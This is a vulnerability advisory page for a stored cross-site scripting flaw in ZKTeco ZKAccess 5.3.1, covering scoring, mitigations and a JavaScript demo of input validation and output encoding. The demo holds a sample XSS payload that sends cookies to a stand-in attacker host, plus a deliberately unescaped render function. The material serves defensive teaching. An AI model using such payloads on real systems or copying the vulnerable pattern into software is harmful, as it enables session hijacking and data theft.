CVE-2016-20032
Published: 16 March 2026
Summary
CVE-2016-20032 is a stored cross-site scripting vulnerability (CWE-79) in ZKTeco ZKAccess Security System 5.3.1, as identified by the referenced advisories (the "Cxsecurity" attribution in the original summary is a reference site, not the vendor). The summary lists a CVSS base score of 5.1 (Medium), while the deeper analysis below derives 7.2 (High) from the published CVSS v3.1 vector; the two figures come from different scoring sources and should not be read as the same metric.
Operationally, exploitation aligns with the MITRE ATT&CK technique JavaScript (T1059.007). The CVE is ranked at the 4.1st percentile by exploit likelihood (well below the median), it is not currently listed in the CISA KEV catalog, and a public proof-of-concept is referenced.
The strongest mitigations our analysis identified are NIST 800-53 SI-10 (Information Input Validation) and SI-15 (Information Output Filtering).
Deeper analysis
CVE-2016-20032 is a stored cross-site scripting (XSS) vulnerability, classified under CWE-79, affecting ZKTeco ZKAccess Security System version 5.3.1. The flaw lets an attacker submit HTML and JavaScript in the 'holiday_name' and 'memo' POST parameters; the application stores the input unsanitized and later inserts it unencoded into the page that lists holiday records, so the payload executes in the browser of every user who views that page.
As scored, unauthenticated attackers (PR:N) with network access (AV:N) can exploit the flaw by submitting crafted HTTP POST requests containing script code in the specified parameters. The vector records low attack complexity (AC:L), no user interaction (UI:N) and a scope change (S:C), with limited impact on confidentiality (C:L) and integrity (I:L) and none on availability (A:N). That vector yields a CVSS v3.1 base score of 7.2 (High). One caveat for practitioners: the UI:N rating reflects that the attacker needs no interaction to plant the payload, but the script only fires once a logged-in user of the application renders the affected page, at which point the attacker can hijack that user's session and read whatever the session can access.
Reference advisories and exploit details are documented in cxsecurity.com (WLB-2016090004), IBM X-Force Exchange (vulnerability 116479), Packet Storm Security (file 138572), Exploit-DB (exploit 40328), and a VulnCheck advisory on the ZKTeco ZKAccess stored XSS issue. None of these publications, as summarized here, specifies a vendor patch or mitigation.
EU & UK References
- 🇪🇺 ENISA EUVD: EUVD-2016-10819
Vulnerability details
ZKTeco ZKAccess Security System 5.3.1 contains a stored cross-site scripting vulnerability that allows attackers to execute arbitrary HTML and script code by injecting malicious payloads through the 'holiday_name' and 'memo' POST parameters. Attackers can submit crafted requests with script code in these parameters to compromise user browser sessions and steal sensitive information.
- CWE(s): CWE-79 (Improper Neutralization of Input During Web Page Generation, 'Cross-site Scripting')
Related Threats
MITRE ATT&CK Enterprise Techniques
Why these techniques?
Stored XSS directly enables arbitrary JavaScript execution in victim browsers (T1059.007, Command and Scripting Interpreter: JavaScript) and in turn enables Browser Session Hijacking (T1185), where the injected script acts with the victim's authenticated session to read data or perform actions on the attacker's behalf.
Mitigating Controls (NIST 800-53 r5)
- SI-10 (Information Input Validation): requires validation and sanitization of inputs such as holiday_name and memo so that script content is rejected or neutralized before it is stored and later rendered.
- SI-15 (Information Output Filtering): requires filtering and encoding of information at the output boundary so that a stored payload is rendered as text and cannot execute in user browsers. This is the control that actually closes a stored XSS, since validation of free-text fields such as memo can never be exhaustive.
- Malicious code protection (control ID not given on this page): provides mechanisms to detect and block malicious code, including script payloads, at ingress or before delivery to client browsers.
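The following is an added example, not ZKAccess code and not taken from any of the referenced advisories. It reproduces the pattern the deeper analysis describes (raw 'holiday_name' and 'memo' values stored and concatenated into HTML) and shows the two control layers the mitigation list names: SI-10 style input validation and SI-15 style output encoding. Only the two field names come from the advisory; the row shape, the HTML table, the attacker hostname and the sample payloads are assumptions constructed for the demonstration.

```javascript
// Added example, not ZKAccess code: a minimal holiday-record handler that
// reproduces the stored-XSS pattern reported for the holiday_name and memo
// POST parameters and shows the two control layers from the mitigation list
// (SI-10 input validation, SI-15 output filtering/encoding).
// Field names holiday_name and memo come from the advisory; everything else
// (row shape, HTML table, attacker hostname, payloads) is assumed.

// Constructed sample of what a crafted POST body could carry.
const MALICIOUS_POST = {
  holiday_name: '<script>new Image().src="http://attacker.example/?c="+document.cookie</script>',
  memo: 'Office closed"><img src=x onerror=alert(1)>',
};
const BENIGN_POST = { holiday_name: 'New Year', memo: 'Office closed' };

// Vulnerable pattern: the submitted strings are stored as-is and later
// concatenated straight into the HTML that every viewer of the page receives.
function storeRow(post) {
  return { holiday_name: post.holiday_name, memo: post.memo };
}
function renderVulnerable(rows) {
  return rows
    .map(r => `<tr><td>${r.holiday_name}</td><td>${r.memo}</td></tr>`)
    .join('');
}

// SI-15 style fix: encode at the output boundary so stored bytes become text,
// never markup. This is the layer that actually neutralizes stored XSS.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, c => map[c]);
}
function renderSafe(rows) {
  return rows
    .map(r => `<tr><td>${escapeHtml(r.holiday_name)}</td><td>${escapeHtml(r.memo)}</td></tr>`)
    .join('');
}

// SI-10 style fix: reject input that cannot be a legitimate value before it is
// stored. holiday_name is a short label, so an allow-list is natural; memo is
// free text, so only length and control characters are checked here. That is
// exactly why validation alone is insufficient and output encoding stays mandatory.
const HOLIDAY_NAME_RE = /^[\p{L}\p{N} .,'()-]{1,64}$/u;
function validateHolidayPost(post) {
  const errors = [];
  if (typeof post.holiday_name !== 'string' || !HOLIDAY_NAME_RE.test(post.holiday_name)) {
    errors.push('holiday_name');
  }
  if (typeof post.memo !== 'string' || post.memo.length > 256 || /[\x00-\x1f\x7f]/.test(post.memo)) {
    errors.push('memo');
  }
  return errors;
}

// Demo check: the rendered table must contain no tags other than its own
// <tr>/<td> markup; any other tag can only have come from stored user input.
function foreignTags(html) {
  return (html.match(/<\/?[a-z][^>]*>/gi) || []).filter(t => !/^<\/?t[rd]>$/i.test(t));
}

function demo() {
  const rows = [storeRow(MALICIOUS_POST)];
  return {
    validationErrors: validateHolidayPost(MALICIOUS_POST),      // ['holiday_name']: memo slips through
    vulnerableForeignTags: foreignTags(renderVulnerable(rows)), // <script>, </script>, <img ...>
    safeForeignTags: foreignTags(renderSafe(rows)),             // []
  };
}

console.log(JSON.stringify(demo(), null, 2));
```

Running the block shows the division of labour between the two controls: the allow-list rejects the 'holiday_name' payload outright, but the 'memo' payload passes input validation because it contains nothing a free-text field can forbid, and it is only the output encoding in renderSafe that turns it into inert text. A real fix would apply escapeHtml (or the template engine's auto-escaping) on every path that renders these fields, not just the listing shown here.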